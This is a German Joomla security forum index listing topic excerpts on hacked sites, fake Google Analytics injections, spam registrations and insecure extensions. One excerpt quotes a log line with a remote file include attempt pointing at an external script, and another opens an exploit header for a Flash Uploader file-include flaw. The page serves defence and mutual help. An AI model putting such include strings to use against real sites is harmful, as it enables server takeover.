Hinweise und Diskussionen rund um die Sicherheit von Joomla.
Hinweise und Diskussionen rund um die Sicherheit von 3rd-Party Applikationen.
FacileForms und Referrer
25.05.2009, 15:30
Wichtige Sicherheitsinformationen gibt es im offiziellen, englischsprachigen Forum. Dort existieren folgende Rubriken: Security: Sicherheitsfragen zu Joomla selbst und der Absicherung des Servers 3rd Party/Non Joomla! Security Issues: Sicherheitsfragen außerhalb des Joomla-Core, insbesondere...
analytics-google.info ist nicht von Google! Die Seite wird hier bereits als Malware gelistet: http://www.malwaredomainlist.com/mdl.php?search=analytics-google.info Es wird Code in die index.php vom Template eingeschleust der auf den ersten Blick wie der Tracking Code von Google Analytics...
Wer das SMF http://www.simplemachines.org/ noch nuzt... der schaut mal hier rein http://forum.easy-joomla.org/index.php/topic,540.msg1604/topicseen.html#new Kurz... Anhänge deaktivieren vorerst http://secunia.com/Advisories/32516/ http://milw0rm.com/exploits/6993
Joomla Flash Uploader Joomla com_joomla_flash_uploader Remote File Include 2.5.1,2.5.2 = http://download.joomlaportal.ch/content/view/1060/ = ============================================ = = Exploit: =...
Aufruf zum Sammeln welche Extensionen NICHT unter Register Globals emulation=OFF .... zu finden in {joomla_DIR}/globals.php funktionieren /** * Use 1 to emulate register_globals = on * * Use 0 to emulate regsiter_globals = off */ define( 'RG_EMULATION', 1 ); Damit hier auch gleich...
Dies ist eine (freie, damit hoffentlich verständlichere) Übersetzung der Joomla! Sicherheits Checkliste (http://forum.joomla.org/index.php/topic,81058.0.html). Wir haben uns bemüht, die Übersetzung so zu gestalten, dass Sie jederzeit leicht entsprechend des englischsprachigen Threads aktualisiert...
Hallo! Ich bin gerade dabei meine Website einem kompletten Sicherheits-Update zu unterziehen! Folgendes ist passiert: Ich nutze noch die 1.0.13 mit Register Globals auf "on". Ich wollte updaten und die Komponenten selektieren, bzw. anpassen! Nun habe ich nur kurz in der Global...
Servus Leute, hab ein kleines Problem. Hatte in letzter Zeit immer wieder mal das Problem dass sich mit der Zeit lauter komische Leute mit gmail.com E-Mail Adressen auf meiner Seite registriert hatten. Hab dann zuerst die bestätigungs Email angeschaltet und dann noch ein Captcha eingebaut, was...
Guten Tag, also ich habe eine Seite erstellt und habe auf meinem WebSpace einen Ordner angelegt mit z.B. meinjoomla ! Dann habe ich mir eine Domain gesichert z.B. www.meinjoomla.de ! Alles schön und geht funktioniert auch .. jedoch wenn ich auf www.meinjoomla.de gehe steht in der Adressleiste...
Hallo, hab da mal eine Frage zum Thema Sicherheit. Täglich finde ich in meinen Logs folgende Einträge: "http://www.meinedomain.com/index.php?option=com_jcalp...tmode=day&date=2007-08-17/tools/send_reminders.php?includedir=http://XXXXXXXX..net/id.txt?" ...
Hi, habe das CGI Script von den Codern http://www.joomlaportal.de/joomla-komponenten/155062-upload-komponente-oder-modul-fuer-bilder-und-videos-ohne-login.html eingebunden in meine Page. Jetzt meine Frage ist das sicher oder kann sich da ein Zugriff auf mein Joomla auftun ? cu+thx
Hallo zusammen, ich habe eine Joomla 1.0.15 Seite am laufen, die offensichtlich gehackt wurde! Wenn man mit dem Internet Explorer das Backend ansurft, kommt eine Meldung Add-On: “Remote Data Services Data Control” von “Microsoft Corporation” ausführen? Gleichzeitig öffnet sich mein...
Habe heute eine Mail bekommen: Sehr geehrte Frau... , auf Ihrem 1&1 Webspace wurde nach einem externen Angriff eine sogenannte Phishing-Seiten abgelegt. Diese Seiten dienen dem Erschleichen von vertraulichen Zugangsdaten. Sie befinden sich unter der URL: hXXp://www.sv-breitenholz.de/...
Hallo, ich betreibe auf meiner Website Joomla 1.0.15, also die letze Joomla 1.0.X Version. Leider gibt es die Komponenten die ich eingesetzt habe nicht für die neuste Joomla Verison. Meine Frage ist, ist es schon ein generelles Sicherheitsrisiko diese Version zu betreiben oder gibs da...
ich habe mir den Tufat flash chat heruntergeladen, nun weiss ich nicht ob ich ihn wirklich installieren soll, da es angeblich früher eine grosse sicherheitslücke gab und viel gehakct wurde. es gibt aber viele die den chat sogar empfehlen da er gut ist für nur 5 dollar. wenn ich google finde...
Servus zusammen, ich hab auf meiner Seite täglich zwischen 300 - 400 Besucher! Das kann aber nicht sein!!!! Es läuft joomla 1.5.7 Jetzt hab ich mal Joomlawatch installiert und sehe das fast jede Minute Bots zugriffe aus Amerika stattfinden! Was kann ich dagegen tun?
Wir haben ein (vermutlich neues) Angriffsmuster entdeckt. Joomla wird infiltriert über mambots/editors/wysiwygpro/document.php Darüber werden Files installiert (im entdecken Fall): /images/stories/genom.php.xl /images/stories/gg.php Damit hat der Angreifer eine Möglichkeit installiert...
Hallo, ist es irgendwie möglich eine ganzen Domain (****) verbieten sich zu registrieren? Das will ich von vorneherein vermeiden: Hallo www.xxxxxxxxxxx.net, Ein neuer Benutzer wurde auf www.xxxxxxxxxxx.net registriert. Diese E-Mail enthält die Anmeldedaten:
Hallo liebe Joomlianer, ich habe ständig einen Gast online, der andauernd versucht meine Seite zu hacken. Ich habe schon JoomlaWatch installiert um die ip zu sehen und zu blocken, doch vergeblich ich konnte seine ip einfach nicht sehen als ob niemanden außer mir auf der Seite gibt. Nun habe...
Hallo Zusammen ich habe eine kleine frage zur Sicherheit meiner Joomla Installation... Habe mir eben mal die configuration.php angesehen und feststellen müssen das für MySQL und FTP die Benutzernamen und Passwort in klartext drinnen stehen... Ich habe die befürchtung das man sich diese Datei...
Hallo Forum! Gestern um 20:45 wurde meine Seite von einer türkischen Hackergruppe lahm gelegt. Offensichtlich (soweit ich das bis jetzt ersehen kann), wurden nur im Root die Index.php, Index.html und im Administrator/Backup die Index.php umgeschrieben. Wer kennt diesen speziefieschen...
http://www.xxxxxxxxxxxxxxxxxxxxxx.de/ könnt ihr bis heute abend sehen, weil ich derzeit auf Arbeit bin - und nun? alles neu aufspielen? Was für traurige Idioten sind das nur die sowas machen? Die Seite ist eigentlich zur Unterstützung eines Kinderheims - tolle Leistung echt! Vor allem was...
Hi, mir wurde heute meine Seite gehackt. Inzwischen habe ich bereits wieder alles hergestellt. Der Einbrecher hat nur den Inhalt der index.php von meinem Template verändert und das admin Passwort. Zuvor hatte ich die Joomla 1.5.3 drauf, inzwischen läuft 1.5.6 Meine Frage wäre nun wie kann...
Hallo, seit einigen Tagen blockt der IE7 und der Firefox3 Popups auf meiner Seite. Es dürften eigentlich keine vorhanden sein, da der Space werbefrei und ich keine Popups installiert habe. Desweiteren habe ich in letzter Zeit keine Mambots, etc. installiert. Klaus, der Betreiber von...
Hiho, vor ein paar Tagen kam per Google-Alert diese Meldung: http://www.searchsecurity.de/themenbereiche/applikationssicherheit/web-application-security/articles/140580/ Ich kann hier im Forum dazu nichts finden. Wenn diese Lücke besteht, wurde sie bereits geschlossen? Auch dazu finde ich...
Hi, ich benutze Joomla! 1.0.5 und CBE 0702a. Wollte fragen ob man da irgendwie bei der Userregistrierung einen Captcha einbauen kann??? Kennt ihr da eine Möglichkeit? Gruß -xIP
Mahlzeit, Arbeiten ist bei mir an der tagesordnung. Wenn nicht auf arbeit dann zuHause an dem gleichen Projekt. Nun komm ich heute zur arbeit, setz mich an mein tisch, schmeiß mein rechner an und wollt erstmal meine homepage checken. Von verschlafenen, noch nicht ganz geöffneten augen in nur 2...
hi irgendwelche helden aus der türkei haben meiner hp nen besuch erstattet. haben nur die index.php umgeschreiben... leider sind auf dem webspace auch andere seite.. bei welchen auch die index.php vertauscht wurde. hab alles wieder da backup zurückgespielt.. und passt alles. aber wie...
Hallo, ich wurde heute darauf aufmerksam gemacht, dass alle meine Seiten www.QRPS.de , die über Joomla generiert werden nach der /Body unsichtbare Links enthalten! Das Ganze geht so über einige Seiten mit den Links und vernichtet mich damit bei sämtlichen Suchmaschinen. A) wie kommt es...
Wie komme ich wieder zu meinem Passwort? Siehe hier http://www.autohaus-hauer.at/ Danke
Hallo allerseits! Ich hätte da ein paar Fragen an die Security-Experten: Gibt es inzwischen eine sichere Version der Komponente User Home Pages von Ravenswood? Auf Joomlaos Link wird sie ja nun schon einige Zeit in der Liste der unsicheren Komponente gelistet. Wäre das evtl. diese:...
Habe die Komponente com_koesubmit (Suchmaschinenanmeldung) hier entdeckt und auch soweit zum laufen bekommen, die Links für die URL Übermittlung sind veraltet und müssen noch ersetzt werden ... Die Komponente ist ja schon ziemlich alt und war ja für Mambo entwickelt worden, daher wollte ich mal...
Habe heute mal auf meiner Seite bei der sh404sef-Komponente "alle URLs exportiert" :? Beim Durchgehen der großen Datei sind mir ganze 18 komische Einträge vorgekommen: ...
Nur Themen anzeigen, die im ausgewählten Zeitraum erstellt wurden.
Geben Sie an, wonach die Themenliste sortiert sein soll.
Reihenfolge
Hinweis: Wenn nach dem Datum sortiert wird, werden bei 'absteigender Reihenfolge' die neuesten Elemente zuerst angezeigt.
Foren-Regeln
